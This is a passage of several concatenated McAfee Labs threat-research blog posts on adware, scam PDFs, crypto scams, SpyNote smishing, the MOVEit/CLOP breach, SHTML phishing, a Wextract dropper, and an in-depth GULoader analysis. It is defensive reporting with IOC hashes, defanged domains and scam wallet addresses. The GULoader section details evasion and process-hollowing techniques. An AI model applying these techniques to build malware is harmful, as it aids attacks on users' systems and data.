com.musicdown | 뮤직다운 | 5f8eb3f86fc608f9de495ff0e65b866a78c25a9260da04ebca461784f039ba16 | 5,000+ |
new.kr.com | 뮤직다운 | 397373c39352ef63786fe70923a58d26cdf9b23fa662f3133ebcbc0c5b837b66 | 100,000+ |
baro.com | 바로TV | 3b4302d00e21cbf691ddb20b55b045712bad7fa71eb570dd8d3d41b8d16ce919 | 10,000+ |
baro.live.tv | 바로TV | 760aa1a6c0d1e8e4e2d3258e197ce704994b24e8edfd48ef7558454893796ebe | 50,000+ |
baro.onair.media | 바로TV | b83a346e18ca20ac5165bc1ce1c8807e89d05abc6a1df0adc3f1f0ad4bb5cd0c | 10,000+ |
kr.baro.dmb | 바로TV | 84a4426b1f8ea2ddb66f12ef383a0762a011d98ff96c27a0122558babdaf0765 | 100,000+ |
kr.live | 바로TV | cccfdf95f74add21da546a03c8ec06c7832ba11091c6d491b0aadaf0e2e57bcc | 1,000+ |
newlive.com | 바로TV | c76af429fabcfd73066302eeb9dd1235fd181583e6ee9ee9015952e20b4f65bf | 50,000+ |
onair.baro.media | 바로TV | 6c61059da2ae3a8d130c50295370baad13866d7e5dc847f620ad171cc01a39e9 | 10,000+ |
freemusic.ringtone.player | 벨소리 무료다운 | 75c74e204d5695c75209b74b10b3469babec1f7ef84c7a7facb5b5e91be0ae3e | 100,000+ |
com.app.allplayer | 실시간 TV | 8d881890cfa071f49301cfe9add6442d633c01935811b6caced813de5c6c6534 | 50,000+ |
com.onair.shop | 실시간 TV | 1501dd8267240b0db0ba00e7bde647733230383d6b67678fc6f0c7f3962bd0d3 | 50,000+ |
eight.krdmb.onair | 실시간 TV | bbd6ddbfee7482fe3fe8b5d96f3be85e09352711a36cd8cf88cfdeaf6ff90c79 | 10,000+ |
free.kr | 실시간 TV | 5f864aa88de07a10045849a7906f616d079eef94cd463e40036760f712361f79 | 10,000+ |
kr.dmb.nine | 실시간 TV | ea49ad38dd7500a6ac12613afe705eb1a4bcab5bcd77ef24f2b9a480a34e4f46 | 100,000+ |
kr.live.com | 실시간 TV | f09cff8a05a92ddf388e56ecd66644bf88d826c5b2a4419f371721429c1359a7 | 10,000+ |
kr.live.onair | 실시간 TV | e8d2068d086d376f1b78d9e510a873ba1abd59703c2267224aa58d3fca2cacbd | 100,000+ |
kr.live.tv | 실시간 TV | 1b64283e5d7e91cae91643a7dcdde74a188ea8bde1cf745159aac76a3417346e | 50,000+ |
kr.media.onair | 실시간 TV | bd0ac9b7717f710e74088df480bde629e54289a61fc23bee60fd0ea560d39952 | 100,000+ |
kr.onair.media | 실시간 TV | d7dd4766043d4f7f640c7c3fabd08b1a7ccbb93eba88cf766a0de008a569ae4d | 1,000+ |
live.kr.onair | 실시간 TV | b84b22bc0146f48982105945bbab233fc21306f0f95503a1f2f578c1149d7e46 | 10,000+ |
live.play.com | 실시간 TV | 516032d21edc2ef4fef389d999df76603538d1bbd9d357a995e3ce4f274a9922 | 50,000+ |
new.com | 실시간 TV | 5d07a113ce389e430bab70a5409f5d7ca261bcdb47e4d8047ae7f3507f044b08 | 50,000+ |
newlive.kr | 실시간 TV | afc8c1c6f74abfadd8b0490b454eebd7f68c7706a748e4f67acb127ce9772cdb | 100,000+ |
onair.best | 실시간 TV | 6234eadfe70231972a4c05ff91be016f7c8af1a8b080de0085de046954c9e8e7 | 50,000+ |
com.m.music.free | 음악다운 | ded860430c581628ea5ca81a2f0f0a485cf2eeb9feafe5c6859b9ecc54a964b2 | 500,000+ |
good.kr.com | 음악다운 | bede67693a6c9a51889f949a83ff601b1105c17c0ca5904906373750b3802e91 | 100,000+ |
new.music.com | 음악다운 | fee6cc8b606cf31e55d85a7f0bf7751e700156ce5f7376348e3357d3b4ec0957 | 1,000+ |
play.com.apps | 음악다운 | b2c1caab0e09b4e99d5d5fd403c506d93497ddb2de3e32931237550dbdbe7f06 | 100,000+ |
com.alltrot.player | 트로트 노래모음 | 469792f4b9e4320faf0746f09ebbcd8b7cd698a04eef12112d1db03b426ff70c | 50,000+ |
com.trotmusic.player | 트로트 노래모음 | 879014bc1e71d7d14265e57c46c2b26537a81020cc105a030f281b1cc43aeb77 | 5,000+ |
best.kr.com | 파도 MP3 | f2bbe087c3b4902a199710a022adf8b57fd927acac0895ab85cfd3e61c376ea5 | 100,000+ |
com.pado.music.mp3 | 파도 MP3 | 9c84c91f28eadd0a93ef055809ca3bceb10a283955c9403ef1a39373139d59f2 | 100,000+ |
The post Invisible Adware: Unveiling Ad Fraud Targeting Android Users appeared first on McAfee Blog.
Authored by: Lakshya Mathur and Yashvi Shah
As the Back-to-School season approaches, scammers are taking advantage of the opportunity to deceive parents and students with various scams. With the increasing popularity of online shopping and digital technology, people are more inclined to make purchases online. Scammers have adapted to this trend and are now using social engineering tactics, such as offering high discounts, free school kits, online lectures, and scholarships, to entice unsuspecting individuals into falling for their schemes.
McAfee Labs has found the following PDFs targeting back-to-school trends. This blog is a reminder for parents on what to educate their children on and how not to fall victim to such fraud.
McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction. The second page contained substantial content on back-to-school advice for parents and students, giving the appearance of a legitimate document. These tactics were employed to make the PDF seem authentic, entice consumers to click on the fake CAPTCHA link, and evade detection.
Figure 1 – Fake CAPTCHA and scammy link
Figure 2 – PDF Second Page
Figure 3 – Zoomed in content from Figure 2
As shown in Figure 1, there is a fake captcha image that, when clicked, redirects to a URL displayed at the bottom left of the figure. This URL has a Russian domain and goes through multiple redirections before reaching its destination. The scam URL contains the text “all hallows prep school uniform,” and leads to a malicious site that sets cookies, monitors user behavior, and collects interactions, sending the data to servers owned by the domain’s operators.
Figures 2 and 3 display the second page of the PDF, designed to appear legitimate to users and spam and security scanners.
In this campaign, we identified a total of 13 domains, with 11 being of Russian origin and 2 from South Africa. You can find the complete list of these domains in the final IOC (Indicators of Compromise) section.
All domains were created between 2020 and 2021 and use Cloudflare’s name servers.
These domains were discovered operating worldwide, targeting consumers across various countries. The United States and India stood out as the top countries where users were most often targeted.
Figure 4 – Geographical distribution of all the scam domains
As the season begins, the scenario is only the beginning of back-to-school scam season. Parents and students should remain vigilant against fraud, such as:
Filetype/URL | Value |
474987c34461cb4bd05b81d040cae468ca5b88e891da4d944191aa819a86ff21 | |
426ad19eb929d0214254340f3809648cfb0ee612c8374748687f5c119ab1a238 | |
5cb6ecc4af42075fa822d2888c82feb2053e67f77b3a6a9db6501e5003694aba | |
Domain | traffine[.]ru |
leonvi[.]ru | |
trafffi[.]ru | |
norin[.]co[.]za | |
gettraff[.]ru | |
cctraff[.]ru | |
luzas.yubit[.]co[.]za | |
ketchas[.]ru | |
maypoin[.]ru | |
getpdf.pw | |
traffset[.]ru | |
jottigo[.]ru | |
trafffe[.]ru |
The post The Season of Back to School Scams appeared first on McAfee Blog.
Authored by: Vallabh Chole and Yerko Grbic
On July 23rd, 2023, Elon Musk announced that the social networking site, Twitter was rebranding as “X”. The news propelled Twitter and X to gain headlines and become the top trending topics on popular social media platforms.
Scammers pounced on this opportunity and started renaming various hacked YouTube and other social media accounts to “twitter-x” and “twitter fund” to promote scam links with new X branding.
Figure 1. Twitter-X-themed YouTube Live Stream by scammer
Figure 2. Twitter X Crypto Scam
This type of scam has been active for some time and uses an innovative approach to lure victims. To make this scam more authentic, attackers target famous Influencers with sponsorship emails that contain password-stealing malware as email attachments. When password stealer malware is executed, the influencer’s session cookies (unique access tokens) are stolen and uploaded to attacker-controlled systems.
Figure 3. Malware Flow Chart
After the influencer’s account has been compromised, the scammer starts to rename channels, in this case to “Twitter CEO” and then the scammers start to live stream an Elon Musk video on YouTube. They post web links for new scam sites in chat, and target YouTube accounts with a large number of subscribers. On other social media platforms, such as Instagram and Twitter, they use compromised accounts to follow users and post screenshots with captions, such as “Thanks Mr.Elon”. If we look for these terms on Instagram, we observe thousands of similar posts. Compromised accounts are also used to post videos for software/game applications, which are malware masquerading as legitimate software or games. These videos demonstrate how to download and execute files, which are common password-stealing malware, and distributed through compromised social media accounts.
McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.
Figure 4. McAfee WebAdvisor detection
Below is a detection heatmap for scam URL’s targeting twitter-x and promoting crypto scams.
Figure 5. Scam URL Detection Heatmap
Figure 6. Password stealer Heatmap
Scam Site | Crypto Type | Wallet | |
twitter-x[.]org | ETH | 0xB1706fc3671115432eC9a997F802aC79CD7f378a | |
twitter-x[.]org | BTC | 1KtgaAjBETdcXiAdGsXJMePT4AEGWqtsug | |
twitter-x[.]org | USDT | 0xB1706fc3671115432eC9a997F802aC79CD7f378a | |
twitter-x[.]org | DOGE | DLCmD43eZ6hPxZVzc8C7eUL4w8TNrBMw9J |
The post Scammers Follow the Rebranding of Twitter to X, to Distribute Malware appeared first on McAfee Blog.
Authored by Yukihiro Okutomi
McAfee’s Mobile team observed a smishing campaign against Japanese Android users posing as a power and water infrastructure company in early June 2023. This campaign ran for a short time from June 7. The SMS message alerts about payment problems to lure victims to a phishing website to infect the target devices with a remote-controlled SpyNote malware. In the past, cybercriminals have often targeted financial institutions. However, on this occasion, public utilities were the target to generate a sense of urgency and push victims to act immediately. Protect your Android and iOS mobile devices with McAfee Mobile Security.
A phishing SMS message impersonating a power or water supplier claims a payment problem, as shown in the screenshot below. The URL in the message directs the victim to a phishing website to download mobile malware.
Notice of suspension of power transmission because of non-payment of charges from a power company in Tokyo (Source: Twitter)
Notice of suspension of water supply because of non-payment of charges from a water company in Tokyo (Source: Twitter)
When accessed with a mobile browser, it will start downloading malware and display a malware installation confirmation dialog.
The confirmation dialog of Spyware installation via browser (Source: Twitter)
SpyNote is a known family of malware that proliferated after its source code was leaked in October 2022. Recently, the malware was used in a campaign targeting financial institutions in January and targeting Bank of Japan in April 2023.
The SpyNote malware is remotely controlled spyware that exploits accessibility services and device administrator privileges. It steals device information and sensitive user information such as device location, contacts, incoming and outgoing SMS messages, and phone calls. The malware deceives users by using legitimate app icons to look real.
Application Icons disguised by malware.
After launching the malware, the app opens a fake settings screen and prompts the user to enable the Accessibility feature. When the user clicks the arrow at the bottom of the screen, the system Accessibility service settings screen is displayed.
A fake setting screen (left), system setting screen (center and right)
By allowing the Accessibility service, the malware disables battery optimization so that it can run in the background and automatically grants unknown source installation permission to install another malware without the user’s knowledge. In addition to spying on the victim’s device, it also steals two-factor authentication on Google Authenticator and Gmail and Facebook information from the infected device.
Although the distribution method is different, the step of requesting Accessibility service after launching the app is similar to the case of the Bank of Japan that occurred in April.
Scammers keep up with current events and attempt to impersonate well-known companies that have a reason to reach out to their customers. The mobile malware attack using SpyNote discovered this time targets mobile apps for life infrastructure such as electricity and water. One of the reasons for this is that electric bills and water bills, which used to be issued on paper, are now managed on the web and mobile app. If you want to learn about smishing, consult this article “What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe”. McAfee Mobile Security detects this threat as Android/SpyNote and alerts mobile users if it is present and further protects them from any data loss. For more information, visit McAfee Mobile Security.
C2 Server:
Malware Samples:
SHA256 Hash | Package name | Application name |
075909870a3d16a194e084fbe7a98d2da07c8317fcbfe1f25e5478e585be1954 | com.faceai.boot | キャリア安全設定 |
e2c7d2acb56be38c19980e6e2c91b00a958c93adb37cb19d65400d9912e6333f | com.faceai.boot | 東京電力 |
a532c43202c98f6b37489fb019ebe166ad5f32de5e9b395b3fc41404bf60d734 | com.faceai.boot | 東京電力TEPCO |
cb9e6522755fbf618c57ebb11d88160fb5aeb9ae96c846ed10d6213cdd8a4f5d | com.faceai.boot | 東京電力TEPCO |
59cdbe8e4d265d7e3f4deec3cf69039143b27c1b594dbe3f0473a1b7f7ade9a6 | com.faceai.boot | 東京電力TEPCO |
8d6e1f448ae3e00c06983471ee26e16f6ab357ee6467b7dce2454fb0814a34d2 | com.faceai.boot | 東京電力TEPCO |
5bdbd8895b9adf39aa8bead0e3587cc786e375ecd2e1519ad5291147a8ca00b6 | com.faceai.boot | 東京電力TEPCO |
a6f9fa36701be31597ad10e1cec51ebf855644b090ed42ed57316c2f0b57ea3c | com.faceai.boot | 東京電力TEPCO |
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422 | com.faceai.boot | 東京電力TEPCO |
755585571f47cd71df72af0fad880db5a4d443dacd5ace9cc6ed7a931cb9c21d | com.faceai.boot | 東京電力TEPCO |
2352887e3fc1e9070850115243fad85c6f1b367d9e645ad8fc7ba28192d6fb85 | com.faceai.boot | 東京電力TEPCO |
90edb28b349db35d32c0190433d3b82949b45e0b1d7f7288c08e56ede81615ba | com.faceai.boot | 東京電力TEPCO |
513dbe3ff2b4e8caf3a8040f3412620a3627c74a7a79cce7d9fab5e3d08b447b | com.faceai.boot | 東京電力TEPCO |
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422 | com.faceai.boot | 東京電力TEPCO |
0fd87da37712e31d39781456c9c1fef48566eee3f616fbcb57a81deb5c66cbc1 | com.faceai.boom | 東京水道局アプリ |
acd36f7e896e3e3806114d397240bd7431fcef9d7f0b268a4e889161e51d802b | com.faceai.boom | 東京水道局アプリ |
91e2f316871704ad7ef1ec74c84e3e4e41f557269453351771223496d5de594e | com.faceai.boom | 東京水道局アプリ |
The post Android SpyNote attacks electric and water public utility users in Japan appeared first on McAfee Blog.
Authored by: Abhishek Karnik and Oliver Devane
You may have heard recently in the news that several organizations, including banks, federal agencies, and corporate entities, have suffered data breaches due to a series of ransomware attacks initiated by the Clop hacker group (aka CLOP, CL0p), that leveraged a vulnerability in MOVEit software.
Three critical vulnerabilities (CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708) have been reported in the software. However, the group is only known to have leveraged one, CVE-2023-34362 to obtain unauthorized access to sensitive data. The vulnerabilities, if exploited, result from a structured query language (SQL) injection attack, that allows attackers access to databases hosted by the MOVEit application.
SQL injection is a technique by which attackers exploit vulnerabilities that allows the injection of malicious code into an application to view or modify a database (in this case MOVEit)
Ransomware is a certain class of malware that tries to extort money as a ransom payment. The typical tactics for such malware are:
While there were no reports of file encryption in this wave, the malicious actors stole files from the impacted companies and are now extorting them by demanding payment to prevent the hackers from releasing the files to the public. It should be noted that this is not the first time Clop has used these tactics.
The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) first warned of this attack via a press release on June 7, 2023. The attackers exploited a zero-day threat in MOVEIt software. Internet-facing MOVEit transfer web applications were compromised through the vulnerabilities listed above and infected with malware that then subsequently stole data from underlying MOVEit databases. The result was that any file that was transferred using MOVEit could also have been stolen by malicious actors. Once the data was siphoned, the attackers contacted the organizations to inform them that they were victims of an attack and that the files would be published publicly if a ransom wasn’t paid on time.
The impact of this is that potentially sensitive files that may have contained intellectual property or personally identifiable customer data could be made available on the Internet. This, of course, would have severe ramifications for not only the impacted organizations, but also for customers or users who had provided information to them.
What can you do?
If you operate a business that utilizes the MOVEit software, it is imperative that you follow guidance provided by Progress Software and CISA.
It’s unlikely that individual consumers will be directly impacted by the CLOP malware. However, there is a possibility that you may have been indirectly impacted if an organization you have previously subscribed to or provided information to is a victim. This FAQ and blog by McAfee contains great details on what steps you should follow if your data is part of a data breach.
Such breaches can also have a ripple effect where malicious actors who weren’t directly involved with the ransomware attack may take advantage of the event, to target potential victims with scams. Be cautious of emails or other correspondence claiming to be from a company that has been impacted by this Ransomware attack. Double-check the email address and verify any links that are present in the emails. Read more about how to recognize and protect yourself from phishing.
The post CLOP Ransomware exploits MOVEit software appeared first on McAfee Blog.
Authored by: Anandeshwar Unnikrishnan
In recent GULoader campaigns, we are seeing a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system. The NSIS scriptable installer is a highly efficient software packaging utility. The installer behavior is dictated by an NSIS script and users can extend the functionality of the packager by adding custom libraries (dll) known as NSIS plugins. Since its inception, adversaries have abused the utility to deliver malware.
NSIS stands for Nullsoft Scriptable Installer. NSIS installer files are self-contained archives enabling malware authors to include malicious assets along with junk data. The junk data is used as Anti-AV / AV Evasion technique. The image below shows the structure of an NSIS GULoader staging executable archive.
The NSIS script, which is a file found in the archive, has a file extension “.nsi” as shown in the image above. The deployment strategy employed by the threat actor can be studied by analyzing the NSIS script commands provided in the script file. The image shown below is an oversimplified view of the whole shellcode staging process.
The file that holds the encoded GULoader shellcode is dropped on to victim’s disc based on the script configuration along with other data. Junk is appended at the beginning of the encoded shellcode. The encoding style varies from sample to sample. But in all most all the cases, it’s a simple XOR encoding. As mentioned before, the shellcode is appended to junk data, because of this, an offset is used to retrieve encoded GULoader shellcode. In the image, the FileSeek NSIS command is used to do proper offsetting. Some samples have unprotected GULoader shellcode appended to junk data.
A plugin used by the NSIS installer is nothing but a DLL which gets loaded by the installer program at runtime and invokes functions exported by the library. Two DLL files are dropped in user’s TEMP directory, in all analyzed samples one DLL has a consistent name of system.dll and name of the other one varies.
The system.dll is responsible for allocating memory for the shellcode and its execution. The following image shows how the NSIS script calls functions in plugin libraries.
The system.dll has the following exports as shown the in the image below. The function named “Call” is being used to deploy the shellcode on victim’s system.
The implementation of the exception handling by the Operating System provides an opportunity for the adversary to take over execution flow. The Vectored Exception Handling on Windows provides the user with ability to register custom exception handler, which is simply a code logic that gets executed at the event of an exception. The interesting thing about handling exceptions is that the way in which the system resumes its normal execution flow of the program after the event of exception. Adversaries exploit this mechanism and take ownership of the execution flow. Malware can divert the flow to the code which is under its control when the exception occurs. Normally it is employed by the malware to achieve following goals:
The GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis. This section will cover the internals of Vectored exception handling on Windows and investigates how GUloader is abusing the VEH mechanism to thwart any analysis efforts.
The Handler routine is of the type PVECTORED_EXCEPTION_HANDLER. Further checking the documentation, we can see the handler function takes a pointer to _EXCEPTION_POINTERS type as its input as shown in the image below.
The _EXCEPTION_POINTERS type holds two important structures; PEXCEPTION_RECORD and PCONTEXT. PEXCEPTION_RECORD contains all the information related to exception raised by the system like exception code etc. and PCONTEXT structure holds CPU register (like RIP/EIP, debug registers etc.) values or state of the thread captured when exception occurred.
Vectored Handler in GULoader
The GULoader sets the trap flag to trigger single stepping intentionally to detect analysis. The handler code gets executed as discussed before, a block of code is executed based on the exception code. If the exception is single stepping, status code is 0x80000004, following actions take place:
EIP Calculation Logic Summary
Trigger via interrupt instruction (INT3) | eip=((ReadByte(eip+1)^0x1A)+eip) |
Trigger via Single Stepping(PUSHFD/POPFD) | eip=((ReadByte(eip+2)^0x1A)+eip) |
*The value 0x1A changes with samples
Detecting Abnormal Execution Flow via VEH
Below image shows this the carefully laid out code to detect analysis.
One interesting feature seen in GULoader shellcode in the wild is runtime padding. Runtime padding is an evasive behavior to beat automated scanners and other security checks employed at runtime. It delays the malicious activities performed by the malware on the target system.
The following images show the egg location validity checks performed by GULoader. The values 0xB8 and 0xC3 are checked by using proper offsets from the egg location.
In the second stage of the infection chain, the GULoader performs anti-analysis and code injection. Major anti-analysis vectors are listed below. After making sure that shellcode is not running in a sandbox, it proceeds to conduct code injection into a newly spawned process where stage 3 is initiated to download and deploy actual payload. This payload can be either commodity stealer or RAT.
Whenever GULoader invokes a Win32 api, the call is sandwiched between two XOR loops as shown in the image below. The loop prior to the call encoded the active shellcode region where the call is taking place to prevent the memory from getting dumped by the security products based on event monitoring or api calls. Following the call, the shellcode region is decoded again back to normal and resumes execution. The XOR key used is a word present in the shellcode itself.
This section covers the process undertaken by the GUloader to decode the strings at the runtime.
The first byte/word is reserved to hold the size of the encoded bytes. Below shows a 12 byte long encoded data being written to memory.
Later, the first word gets replaced by the first word of the actual encoded data. Below image shows the buffer after replacing the first word.
The encoded data is fully recovered now, and malware proceeds to decode it. For decoding the simple XOR is employed, and key is present in the shellcode. The assembly routine that does the decoding is shown in the image below. Each byte in the buffer is XORed with the key.
The result of the XOR operation is written to same memory buffer that holds the encoded data. A final view of the memory buffer with decoded data is shown below.
The image shows the decoding the string “psapi.dll”, later this string is used in fetching the addresses of various functions to employ anti-analysis.
The stage 2 culminates in code injection, to be specific GULoader employs a variation of the process hollowing technique, where a benign process is spawned in a suspended state by the malware stager process and proceeds to overwrite the original content present in the suspended process with malicious content, later the state of the thread in the suspended process is changed by modifying processor register values like EIP and finally the process resumes its execution. By controlling EIP, malware can now direct the control flow in the spawned process to a desired code location. After a successful hollowing, the malware code will be running under the cover of a legit application.
The variation of hollowing technique employed by the GULoader doesn’t replace the file contents, but instead injects the same shellcode and maps the memory in the suspended process. Interestingly, GULoader employs an additional technique if the hollowing attempt fails. More details are covered in the following section.
Listed below Win32 native APIs are dynamically resolved at runtime to perform the code injection.
After memory allocation, it writes itself into remote process via NtWriteVirtualMemory as discussed above. GULoader shellcodes taken from the field are bigger in size, samples taken for this analysis are all greater than 20 mb. In samples analyzed, the buffer size allocated to hold the shellcode is 2950000 bytes. The below image shows the GuLoader shellcode in the memory.
The RVA is added to the base address of the newly allocated memory in the CasPol.exe process to obtain new VA which can be used in the remote process. The new VA is written into EIP and EBX field in the thread context structure of the CasPol.exe process retrieved via ZwGetContextThread. Below image shows the modified context structure and value of EIP.
Finally, by calling ZwSetContextThread, the changes made to the CONTEXT structure is committed in the target thread of CasPol.exe process. The thread is resumed by calling NtResumeThread. The CasPol.exe resumes execution and performs stage 3 of the infection chain.
The GULoader shellcode resumes execution from within a new host process, in this report, analyzed samples inject the shellcode either into the same process spawned as a child process or caspol.exe. Stage3 performs all the anti-analysis once again to make sure this stage is not being analyzed. After all checks, GUloader proceeds to perform stage3 activities by decoding the encoded C2 string in the memory as shown in the image below. The decoding method is the same as discussed before.
Later the addresses of following functions are resolved dynamically by loading wininet.dll:
The below image shows the response from the content delivery network (cdn) server where the final payload is stored. In this analysis, a payload of size 0x2E640 bytes is sent to the loader. Interestingly, the first 40 bytes are ignored by the loader. The actual payload starts from the offset 40 which is highlighted in the image.
The cdn server is well protected, it only serves to clients with proper headers and cookies. If these are not present in the HTTP request, the following message is shown to the user.
The first step in decoding the the downloaded final payload by the GUloader is generating a quasi key which will be later used in decoding the actual key embeded in the GULoader shellcode. The encoded embeded key size is 371 bytes in analysed sample. The process of quasi key generation is as follows:
The embedded key in the GULoader shellcode is of the size 371 bytes as discussed before. The quasi key is used to decode the embeded key as shown in the image below.
The decoded 371 bytes of embeded key is shown below in the image below.
A byte level decoding happens after embeded key is decoded in the memory. Each byte of the downloaded data is XORed with the key to obtain the actual data, which is a PE file. The decoded data is overwritten to the same buffer used to download the decoded data.
The final decoded PE file residing in the memory is shown in the image below:
Finally, the loader loads the PE file by allocating the memory with RWX permission in the stage3 process, based on analyzing multiple samples it’s either the same process in stage 2 as the child process, or casPol.exe. The loading involved code relocation and IAT correction as expected in such a scenario. The final payload resumes execution from within the hollowed stage3 process. Below malware families are usually seen deployed by the GULoader:
Below image shows the injected memory regions in stage3 process caspol.exe in this report.
The role played by malware loaders popularly known as “crypters” is significant in the deployment of Remote Administration Tools and stealer malwares that target consumer data. The exfiltrated Personal Identifiable Information (PII) extracted from the compromised endpoints are largely collected and funneled to various underground data selling marketplaces. This also impacts businesses as various critical information used for authentication purposes are getting leaked from the personal systems of the user leading to initial access on the company networks. The GuLoader is heavily used in mass malware campaigns to infect the users with popular stealer malware like Raccoon, Vidar, and Redline. Commodity RATs like Remcos are also seen delivered in such campaign activities. On the bright side, it is not difficult to fingerprint malware specimens used in the mass campaigns because of the volume its volume and relevance, detection rules and systems can be built around this very fact.
Win32 API |
RtlAddVectoredExceptionHandler |
NtAllocateVirtualMemory |
DbgUIRemoteBreakIn |
LdrLoadDll |
DbgBreakPoint |
EnumWindows |
Nt/ZwSetInformationThread |
EnumDeviceDrivers |
GetDeviceDriverBaseNameA |
MsiEnumProductsA |
MsiGetProductInfoA |
TerminateProcess |
ExitProcess |
NtSetContextThread |
NtWriteVirtualMemory |
NtCreateSection |
NtMapViewOfSection |
NtOpenFile |
NtSetInformationProcess |
NtClose |
NtResumeThread |
NtProtectVirtualMemory |
CreateProcessInternal |
GetLongPathNameW |
Sleep |
NtCreateThreadEx |
WaitForSingleObject |
TerminateThread |
CreateFileW |
WriteFile |
CloseHandle |
GetFileSize |
ReadFile |
ShellExecuteW |
SHCreateDirectoryExW |
RegCreateKeyExA |
RegSetValueExA |
OpenSCManagerA |
EnumServiceStatusA |
CloseServiceHandle |
NtQueryInformationProcess |
InternetOpenA |
InternetSetOptionA |
InternetOpenUrlA |
InternetReadFile |
InternetCloseHandle |
889fddcb57ed66c63b0b16f2be2dbd7ec0252031cad3b15dfea5411ac245ef56
59b71cb2c5a14186a5069d7935ebe28486f49b7961bddac0a818a021373a44a3
4d9cdd7526f05343fda35aca3e0e6939abed8a037a0a871ce9ccd0e69a3741f2
c8006013fc6a90d635f394c91637eae12706f58897a6489d40e663f46996c664
c69e558e5526feeb00ab90efe764fb0b93b3a09692659d1a57c652da81f1d123
45156ac4b40b7537f4e003d9f925746b848a939b2362753f6edbcc794ea8b36a
e68ce815ac0211303d2c38ccbb5ccead144909d295230df4b7a419dfdea12782
b24b36641fef3acbf3b643967d408b10bf8abfe1fe1f99d704a9a19f1dfc77e8
569aa6697083993d9c387426b827414a7ed225a3dd2e1e3eba1b49667573fdcb
60de2308ebfeadadc3e401300172013be27af5b7d816c49696bb3dedc208c54e
23458977440cccb8ac7d0d05c238d087d90f5bf1c42157fb3a161d41b741c39d
The post GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader appeared first on McAfee Blog.
Authored By Anuradha
McAfee Labs has recently observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest user-sensitive information.
SHTML Campaign in the field:
Figure 1. shows the geological distribution of McAfee clients who detect malicious SHTML files.
Figure 1. McAfee Client Detection of SHTML
Attackers victimize users by distributing SHTML files as email attachments. The sentiments used in such phishing emails include a payment confirmation, invoice, shipment etc., The email contains a small thread of messages to make the recipient more curious to open the attachment.
Figure 2. Email with SHTML attachment
Analysis:
When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser as shown in Figure 3. To read the document, however, the user must enter his/her credentials. In some cases, the email address is prefilled.
Figure 3. Fake PDF document
Figure 4. Fake Excel document
Figure 5. Fake DHL Shipping document
Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior.
Figure 6. SHTML with JavaScript code
Below is the code snippet that shows how the blurred background image is loaded. The blurred images are taken from legitimate websites such as:
https://isc.sans.edu
https://i.gyazo.com
Figure 7. Code to load blurred image
Abusing submission form service:
Phishing attacks abuse static form service providers to steal sensitive user information, such as Formspree and Formspark
Formspree.io is a back-end service that allows developers to easily add forms on their website without writing server-side code, it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address.
The attackers use the formpsree.io URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method.
Figure 8. Formspree.io as action URL with POST method
When the user enters the credentials and hits the “submit” button, the data is sent to Formspree.io. Subsequently, Formspree.io forwards the information to the specified email address. Below Figure 9. shows the flow of user submission data from webpage to attacker email address.
Figure 9. Flow of user submission data
Known malicious forms may be blocked, preventing the form submission data from being sent to the attacker. Below Figure 10. shows the Form blocked due to suspected fraudulent activity.
Figure 10. Form Blocked
To prevent the user from recognizing that they’ve just been phished, the attacker redirects the user’s browser to an unrelated error page that is associated to a legitimate website.
Below Figure 11. shows the redirected webpage.
Figure 11. Redirected webpage
To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry image phishing scam uses simple basic HTML and JavaScript code, but it can still be effective. A blurry image is enough to trick many users into believing the email as legitimate. To stay protected, users should keep their system up-to-date and refrain from clicking links and opening SHTML attachments that comes through email from untrusted sources.
IOCs
McAfee customers are protected against this phishing campaign.
|
||||||||||||||||||||
Type | Value | Product | Detected |
shtml(Adobe) | 0a072e7443732c7bdb9d1f3fdb9ee27c | Total Protection and LiveSafe | HTML/Phishing.qz |
shtml(Excel) | 3b215a37c728f65c167941e788935677 | Total Protection and LiveSafe | HTML/Phishing.rb |
shtml(DHL) | 257c1f7a04c93a44514977ec5027446c | Total Protection and LiveSafe | HTML/Phishing.qz |
The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.
Authored by By Yashvi Shah
McAfee Labs have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.
Wextract.exe is a Windows executable file that is used to extract files from a cabinet (.cab) file. Cabinet files are compressed archives that are used to package and distribute software, drivers, and other files. It is a legitimate file that is part of the Windows operating system, and it is located in the System32 folder of the Windows directory. However, like other executable files, it can be vulnerable to exploitation by malicious actors who might use it as a disguise for malware.
Some common ways that malicious actors use a fake or modified version of wextract.exe include:
McAfee Labs collected malicious wextract.exe samples from the wild, and its behavior was analyzed.
This blog provides a detailed technical analysis of malicious “wextract.exe” that is used as a delivery mechanism for multiple types of malwares, including Amadey and Redline Stealer. It also provides detailed information on the techniques used by the malware to evade detection by security software and execute its payload. Once the malware payloads are executed on the system, they establish communication with a Command and Control (C2) server controlled by the attacker. This communication allows the attacker to exfiltrate data from the victim’s system, including sensitive information such as login credentials, financial data, and other personal information.
Figure 1: Characteristic of the file
The file is a 32-bit Portable Executable file, which is 631.50 Kb in size. The original name of the file is WEXTRACT.EXE.MUI. The file description is “Самоизвлечение CAB-файлов Win32”, written in Russian, and means “Self-Extracting Win32 CAB Files”. The legal copyright mentions Microsoft Corporation. A lot of static strings of this file were found to be written in Russian.
